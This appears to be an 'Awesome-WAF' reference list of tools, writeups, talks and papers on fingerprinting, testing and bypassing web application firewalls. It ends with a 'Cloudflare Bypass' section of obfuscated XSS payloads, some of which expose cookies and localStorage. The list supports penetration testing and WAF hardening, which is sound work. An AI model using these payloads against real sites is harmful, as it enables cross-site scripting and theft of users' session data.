Awesome-WAF - The Definitive Guide.
Detection and Fingerprinting Tools
- WhatWaf - Detect and bypass web application firewalls and protection systems
- WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
- IdentYwaf - A blind WAF detection tool which utlises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm.
WAF Testing Guides and Tools
- XSS-Rat's WAF Checklist - Everything you need to do to bypass a Web Application Firewall.
- GoTestWAF - A tool to test a WAF's detection logic and bypasses from @wallarm.
- Lightbulb Framework - A WAF testing suite written in Python.
- WAFBench - A WAF performance testing suite by Microsoft.
- WAF Testing Framework - A WAF testing tool by Imperva.
- Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline.
- abuse-ssl-bypass-waf - Bypassing WAF by abusing SSL/TLS Ciphers
WAF Evasion and Bypass Tools
- WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou.
- WAFTester - Another tool which can obfuscate payloads to bypass WAFs by @Raz0r.
- libinjection-fuzzer - A fuzzer intended for finding
libinjectionbypasses but can be probably used universally. - bypass-firewalls-by-DNS-history - Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
- abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
- SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
- Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests seem from the internal network
- Bypass Payloads
{% tabs %} {% tab title="Blogs and Writeups" %}
Many of the content mentioned above have been taken from some of the following excellent writeup
- Web Application Firewall (WAF) Evasion Techniques #1 - By @Secjuice.
- Web Application Firewall (WAF) Evasion Techniques #2 - By @Secjuice.
- Web Application Firewall (WAF) Evasion Techniques #3 - By @Secjuice.
- How To Exploit PHP Remotely To Bypass Filters & WAF Rules- By @Secjuice
- ModSecurity SQL Injection Challenge: Lessons Learned - By @SpiderLabs.
- XXE that can Bypass WAF - By @WallArm.
- SQL Injection Bypassing WAF - By @OWASP.
- How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing - By @SunnyHoi.
- Bypassing Web-Application Firewalls by abusing SSL/TLS - By @0x09AL.
- Request Encoding to Bypass WAFs - By @Soroush Dalili {% endtab %}
{% tab title="Presentations" %}
- Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion.
- Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP.
- WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP.
- Protocol Level WAF Evasion Techniques - A presentation at about efficiently evading WAFs at protocol level from BlackHat US 12.
- Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16.
- WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits.
- Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
- Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09.
- Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16.
- A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester.
- Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid mode waf that can work both in an out-of-band manner as well as inline to reduce false positives and latency Auscert2019. {% endtab %}
{% tab title="Videos" %}
- WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior from @OWASP.
- Confessions of a WAF Developer: Protocol-Level Evasion of Web App Firewalls from BlackHat USA 12.
- Web Application Firewall - Analysis of Detection Logic from BlackHat.
- Bypassing Browser Security Policies for Fun & Profit from BlackHat.
- Web Application Firewall Bypassing from Positive Technologies.
- Fingerprinting Filter Rules of Web Application Firewalls - Side Channeling Attacks from @UseNix.
- Evading Deep Inspection Systems for Fun and Shell from BlackHat US 13.
- Bypass OWASP CRS && CWAF (WAF Rule Testing - Unrestricted File Upload) from Fools of Security.
- WAFs FTW! A modern devops approach to security testing your WAF from AppSec USA 17.
- Web Application Firewall Bypassing WorkShop from OWASP.
- Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch from Rafay Bloch.
- WTF - WAF Testing Framework from AppSecUSA 13.
- The Death of a Web App Firewall from Brian McHenry.
- Adventures with the WAF from BSides Manchester.
- Bypassing Intrusion Detection Systems from BlackHat.
- Building Your Own WAF as a Service and Forgetting about False Positives from Auscert. {% endtab %}
{% tab title="Research Papers" %}
- Protocol Level WAF Evasion - A protocol level WAF evasion techniques and analysis by Qualys.
- Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks.
- Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution.
- Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis.
- Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters.
- WAF Evasion Testing - A WAF evasion testing guide from SANS.
- Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
- WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium.
- WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam.
- Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
- Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs.
- Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs. {% endtab %} {% endtabs %}
Cloudflare Bypass
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<img ignored=() src=x onerror=prompt(1)>